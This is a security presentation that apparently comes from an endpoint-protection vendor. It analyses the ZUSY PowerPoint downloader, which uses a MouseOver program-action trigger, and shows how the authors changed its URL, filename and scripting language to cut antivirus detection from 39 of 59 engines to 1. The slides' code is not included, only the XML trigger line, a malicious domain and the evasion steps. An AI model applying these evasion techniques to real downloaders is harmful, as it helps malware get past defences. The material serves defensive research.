AntiVirus protection es not enough. More advanced EndPoint protection is needed. In this presentation you can see how easy is to evade a ZUSY thread (downloader script).
2. ZUSY
• The term Zusy has been used to name a thread
that uses a downloader embedded in powerpoint
documents (.ppsx).
• The thread was found in-the-wild on early June
2017
• It does not use macros
• It does not requiere even a single ‘click’ (in some
scenarios)
3. ZUSY
• When a malicious ZUSY document is opened we see
something like this:
4. ZUSY
• The document is opened in full-screen mode (.ppsx) and there is
are more slides. This pretends to make the user roll the mouse
over the “link”, when this is done, it activates the “trigger”
5. ZUSY
• Fortunately in Office 2013 and Office 2010 a warning
message will pop up to prevent the user to execute the
malware :P
6. ZUSY
• If the user allows ZUSYs execution or if the
warning does not appear, the code will be
executed as a consequence of the MouseOver
action defined in ppt/slides/slide1.xml
• <a:hlinkMouseOver r:id="rId2"
action=“ppaction://program"/>
• The id="rId2" is defined in
ppt/slides/_rels/slide1.xml.rels
7. ZUSY
• The code is something like:
• Target contains the malicious script URL encoded.
Here you can see it decoded:
8. ZUSY
• After replacing [char] 0x2F with “/“ character
and formatting the code a little bit:
Execution of the file
Downloads a malicious file in the temporary folder
The ZUSY code is a Downloader
9. ZUSY
• At VirusTotal we can find this sample identified
by its SHA226 hash:
796a386b43f12b99568f55166e339fcf43a4
792d292bdd05dafa97ee32518921
11. • We will now learn how to modify ZUSY to avoid AntiVirus detection.
• The first modification made was the replacement of the malicious
URL cccn.nl/c.php by “blabla.net” and the name of the original file by
“svchost.exe”
• The code is the following:
Modifying ZUSY
12. • The result in VirusTotal of this scan has the
following detection rate (13 of 59 AVs):
Modifying ZUSY
13. • Clearly many AntiVirus have a signature only for the malicious site and
/ or the filename and not the script itself.
• It is interesting, because if you think about it, a script that downloads a
file and executes it does not have to necessarily be malware.
• However, a powerpoint that uses a MouseOver action to run a
powershell script that downloads a file from the internet and executes
it, is difficult not to be considered malware. The criteria of certain
AntiVirus is at least curious.
• There are many AntiVirus which have chosen to establish a signature
only for the site and the file. Among others:
• Avast, AVG, CalmAV, Comodo, Ikarus, Fortinet, McAfee, Microsoft,
Panda, Symantec, TrendMicro, etc.
Modifying ZUSY
14. • Since it was easy to lower the detection rate
from 39 to 13 AVs, some additional tests
were performed and the results indicate that
the rest of the AVs focus on the execution of
the powershell, the flags and the functions
used (DownloadFile and Invoke-Item)
• We decided to make a more radical
modification, a different implementation of
the downloader.
Modifying ZUSY
15. • This is a VBS (Visual Basic Script) that performs
the same function:
Modifying ZUSY
16. • To be able to execute it the script must be implemented in this way:
• The script creates a new script (asdf.vbs) that contains the
powershell script and finally it is executed using cscript asdf.vbs (and
deleted after execution)
Modifying ZUSY
17. • After the URL encoding we put it in
ppt/slides/_rels/slide1.xml.rels:
Modifying ZUSY
18. • The VirusTotal detection of the modified script is
the following (1 of 59 AVs):
Modifying ZUSY
19. • Only the Chinese AntiVirus Qihoo 360 notices it as suspicious
file.
• The script works, it downloads and executes the payload
Modifying ZUSY
20. • AntiVirus evasion of this kind of scripts (downloaders) is
easy.
• These threats are very dangerous and the computers
should be protected in a proper way, not only by trusting the
AntiVirus protection.
• Our recommendation is to establish an advanced EndPoint
protection that allows a higher level of detection of these
threats and at the same time, a high level of logging of all
the actions carried out by every process in order to use
them to identify in depth the threat in case of an incident.
Conclusión